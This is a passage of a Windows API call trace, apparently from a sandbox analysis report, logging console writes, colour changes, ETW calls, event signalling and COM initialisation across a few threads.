[0287.450] GetConsoleOutputCP () returned 0x1b5 [0287.451] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.451] GetConsoleOutputCP () returned 0x1b5 [0287.451] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.451] GetConsoleOutputCP () returned 0x1b5 [0287.451] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.452] GetConsoleOutputCP () returned 0x1b5 [0287.452] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.452] GetConsoleOutputCP () returned 0x1b5 [0287.452] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.452] GetConsoleOutputCP () returned 0x1b5 [0287.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.453] GetConsoleOutputCP () returned 0x1b5 [0287.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.453] GetConsoleOutputCP () returned 0x1b5 [0287.453] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.454] GetConsoleOutputCP () returned 0x1b5 [0287.454] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.454] GetConsoleOutputCP () returned 0x1b5 [0287.454] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.454] GetConsoleOutputCP () returned 0x1b5 [0287.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.455] GetConsoleOutputCP () returned 0x1b5 [0287.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.455] GetConsoleOutputCP () returned 0x1b5 [0287.455] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.456] GetConsoleOutputCP () returned 0x1b5 [0287.456] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.456] GetConsoleOutputCP () returned 0x1b5 [0287.456] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.456] GetConsoleOutputCP () returned 0x1b5 [0287.457] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.457] GetConsoleOutputCP () returned 0x1b5 [0287.457] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.457] GetConsoleOutputCP () returned 0x1b5 [0287.458] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.459] GetConsoleOutputCP () returned 0x1b5 [0287.460] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.460] GetConsoleOutputCP () returned 0x1b5 [0287.460] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.460] GetConsoleOutputCP () returned 0x1b5 [0287.461] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.461] GetConsoleOutputCP () returned 0x1b5 [0287.461] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.461] GetConsoleOutputCP () returned 0x1b5 [0287.461] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.461] GetConsoleOutputCP () returned 0x1b5 [0287.462] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef88008, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef88008) returned 0 [0287.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88088 | out: lpConsoleScreenBufferInfo=0x653ef88088) returned 1 [0287.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.463] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.463] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.463] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0287.464] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.464] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0287.465] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88060 | out: lpMode=0x653ef88060) returned 1 [0287.465] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c168b34*, nNumberOfCharsToWrite=0x72, lpNumberOfCharsWritten=0x653ef88050, lpReserved=0x0 | out: lpBuffer=0x25b5c168b34*, lpNumberOfCharsWritten=0x653ef88050*=0x72) returned 1 [0287.466] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.467] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0287.468] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.469] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0287.469] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88100 | out: lpMode=0x653ef88100) returned 1 [0287.470] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef880f0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef880f0*=0x1) returned 1 [0287.470] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88088 | out: lpConsoleScreenBufferInfo=0x653ef88088) returned 1 [0287.471] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.471] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.471] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.472] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0287.473] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.473] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0287.473] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88060 | out: lpMode=0x653ef88060) returned 1 [0287.474] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c1696fc*, nNumberOfCharsToWrite=0x5f, lpNumberOfCharsWritten=0x653ef88050, lpReserved=0x0 | out: lpBuffer=0x25b5c1696fc*, lpNumberOfCharsWritten=0x653ef88050*=0x5f) returned 1 [0287.475] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.475] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0287.476] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.476] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0287.477] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88100 | out: lpMode=0x653ef88100) returned 1 [0287.477] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef880f0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef880f0*=0x1) returned 1 [0287.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88088 | out: lpConsoleScreenBufferInfo=0x653ef88088) returned 1 [0287.478] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.479] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.479] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.480] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0287.481] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.482] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0287.482] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88060 | out: lpMode=0x653ef88060) returned 1 [0287.483] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c1679b4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x653ef88050, lpReserved=0x0 | out: lpBuffer=0x25b5c1679b4*, lpNumberOfCharsWritten=0x653ef88050*=0x10) returned 1 [0287.483] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.484] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0287.484] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.484] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0287.485] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88100 | out: lpMode=0x653ef88100) returned 1 [0287.485] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef880f0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef880f0*=0x1) returned 1 [0287.486] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88088 | out: lpConsoleScreenBufferInfo=0x653ef88088) returned 1 [0287.486] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.486] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.487] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.487] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0287.488] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.488] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0287.489] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88060 | out: lpMode=0x653ef88060) returned 1 [0287.489] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c1679f4*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x653ef88050, lpReserved=0x0 | out: lpBuffer=0x25b5c1679f4*, lpNumberOfCharsWritten=0x653ef88050*=0x3) returned 1 [0287.489] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.490] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0287.490] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.491] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0287.492] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88100 | out: lpMode=0x653ef88100) returned 1 [0287.493] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef880f0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef880f0*=0x1) returned 1 [0287.493] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88088 | out: lpConsoleScreenBufferInfo=0x653ef88088) returned 1 [0287.494] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.494] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.494] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.495] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0287.495] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.496] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0287.497] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88060 | out: lpMode=0x653ef88060) returned 1 [0287.497] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c167a14*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x653ef88050, lpReserved=0x0 | out: lpBuffer=0x25b5c167a14*, lpNumberOfCharsWritten=0x653ef88050*=0x3) returned 1 [0287.498] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.498] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0287.499] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.499] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0287.499] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88100 | out: lpMode=0x653ef88100) returned 1 [0287.500] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef880f0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef880f0*=0x1) returned 1 [0287.500] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88088 | out: lpConsoleScreenBufferInfo=0x653ef88088) returned 1 [0287.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.502] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0287.503] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.504] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0287.504] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88060 | out: lpMode=0x653ef88060) returned 1 [0287.505] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c167a34*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0x653ef88050, lpReserved=0x0 | out: lpBuffer=0x25b5c167a34*, lpNumberOfCharsWritten=0x653ef88050*=0x55) returned 1 [0287.505] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.506] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0287.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.507] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0287.507] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88100 | out: lpMode=0x653ef88100) returned 1 [0287.507] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef880f0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef880f0*=0x1) returned 1 [0287.508] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88088 | out: lpConsoleScreenBufferInfo=0x653ef88088) returned 1 [0287.508] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.509] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.509] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.509] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0287.510] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.510] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0287.511] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88060 | out: lpMode=0x653ef88060) returned 1 [0287.511] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c167afc*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x653ef88050, lpReserved=0x0 | out: lpBuffer=0x25b5c167afc*, lpNumberOfCharsWritten=0x653ef88050*=0x36) returned 1 [0287.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.512] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0287.512] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.513] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0287.514] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88100 | out: lpMode=0x653ef88100) returned 1 [0287.515] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef880f0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef880f0*=0x1) returned 1 [0287.515] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88088 | out: lpConsoleScreenBufferInfo=0x653ef88088) returned 1 [0287.516] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.516] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.516] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.517] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0287.517] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef88038 | out: lpConsoleScreenBufferInfo=0x653ef88038) returned 1 [0287.518] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0287.518] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88060 | out: lpMode=0x653ef88060) returned 1 [0287.518] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c167b84*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef88050, lpReserved=0x0 | out: lpBuffer=0x25b5c167b84*, lpNumberOfCharsWritten=0x653ef88050*=0x1) returned 1 [0287.519] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.519] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0287.520] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef87fe8 | out: lpConsoleScreenBufferInfo=0x653ef87fe8) returned 1 [0287.520] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0287.521] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef88100 | out: lpMode=0x653ef88100) returned 1 [0287.521] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef880f0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef880f0*=0x1) returned 1 [0287.523] EtwEventActivityIdControl () returned 0x0 [0287.523] EtwEventActivityIdControl () returned 0x0 [0287.527] EtwEventActivityIdControl () returned 0x0 [0287.527] EtwEventActivityIdControl () returned 0x0 [0287.527] EtwEventActivityIdControl () returned 0x0 [0287.527] EtwEventActivityIdControl () returned 0x0 [0287.528] EtwEventActivityIdControl () returned 0x0 [0287.528] EtwEventActivityIdControl () returned 0x0 [0287.529] EtwEventActivityIdControl () returned 0x0 [0287.529] EtwEventActivityIdControl () returned 0x0 [0287.530] SetEvent (hEvent=0x6f8) returned 1 [0287.530] SetEvent (hEvent=0x720) returned 1 [0287.530] SetEvent (hEvent=0x71c) returned 1 [0287.530] SetEvent (hEvent=0x700) returned 1 [0287.530] SetEvent (hEvent=0x728) returned 1 [0287.530] SetEvent (hEvent=0x724) returned 1 [0287.530] SetEvent (hEvent=0x70c) returned 1 [0287.530] SetEvent (hEvent=0x708) returned 1 [0287.530] SetEvent (hEvent=0x714) returned 1 [0287.546] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8eb50*=0x704, lpdwindex=0x653ef8e924 | out: lpdwindex=0x653ef8e924) returned 0x0 [0287.546] SetThreadUILanguage (LangId=0x0) returned 0x409 [0287.549] CoCreateGuid (in: pguid=0x653ef8ea08 | out: pguid=0x653ef8ea08*(Data1=0x5385b88e, Data2=0x85cb, Data3=0x404b, Data4=([0]=0x9a, [1]=0x41, [2]=0xa0, [3]=0xe2, [4]=0x9d, [5]=0x5b, [6]=0x2a, [7]=0x78))) returned 0x0 [0287.553] EtwEventActivityIdControl () returned 0x0 [0287.553] EtwEventActivityIdControl () returned 0x0 [0287.553] EtwEventActivityIdControl () returned 0x0 [0287.778] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x2, pHandles=0x653ef8e1b0*=0x998, lpdwindex=0x653ef8dfa4 | out: lpdwindex=0x653ef8dfa4) returned 0x0 [0287.784] SetEvent (hEvent=0xb30) returned 1 [0287.784] SetEvent (hEvent=0x998) returned 1 [0287.785] EtwEventActivityIdControl () returned 0x0 [0287.785] SetEvent (hEvent=0xab8) returned 1 [0287.785] SetEvent (hEvent=0xb30) returned 1 [0287.785] SetEvent (hEvent=0x998) returned 1 [0287.785] SetEvent (hEvent=0xad8) returned 1 [0287.785] SetEvent (hEvent=0xb34) returned 1 [0287.785] SetEvent (hEvent=0xaf0) returned 1 [0287.785] SetEvent (hEvent=0x990) returned 1 [0287.785] SetEvent (hEvent=0xa64) returned 1 [0287.825] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8eb50*=0x704, lpdwindex=0x653ef8e924 | out: lpdwindex=0x653ef8e924) returned 0x0 [0288.045] CoGetContextToken (in: pToken=0x653ef8f3f0 | out: pToken=0x653ef8f3f0) returned 0x0 [0288.046] CoUninitialize () [0288.091] GenericStreamBase::Read () returned 0x0 [0288.091] GenericStreamBase::Read () returned 0x0 [0288.091] GenericStreamBase::Read () returned 0x0 Thread: id = 36 os_tid = 0x8 [0213.887] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0213.888] CoGetContextToken (in: pToken=0x653f00f490 | out: pToken=0x653f00f490) returned 0x0 [0213.888] CObjectContext::QueryInterface () returned 0x0 [0213.888] CObjectContext::GetCurrentThreadType () returned 0x0 [0213.888] Release () returned 0x0 [0213.888] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0213.888] CoUninitialize () [0213.888] RoInitialize () returned 0x1 [0213.888] RoUninitialize () returned 0x0 [0254.031] CoUninitialize () Thread: id = 37 os_tid = 0x770 Thread: id = 38 os_tid = 0x12a0 Thread: id = 39 os_tid = 0x12c0 [0228.038] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0228.039] 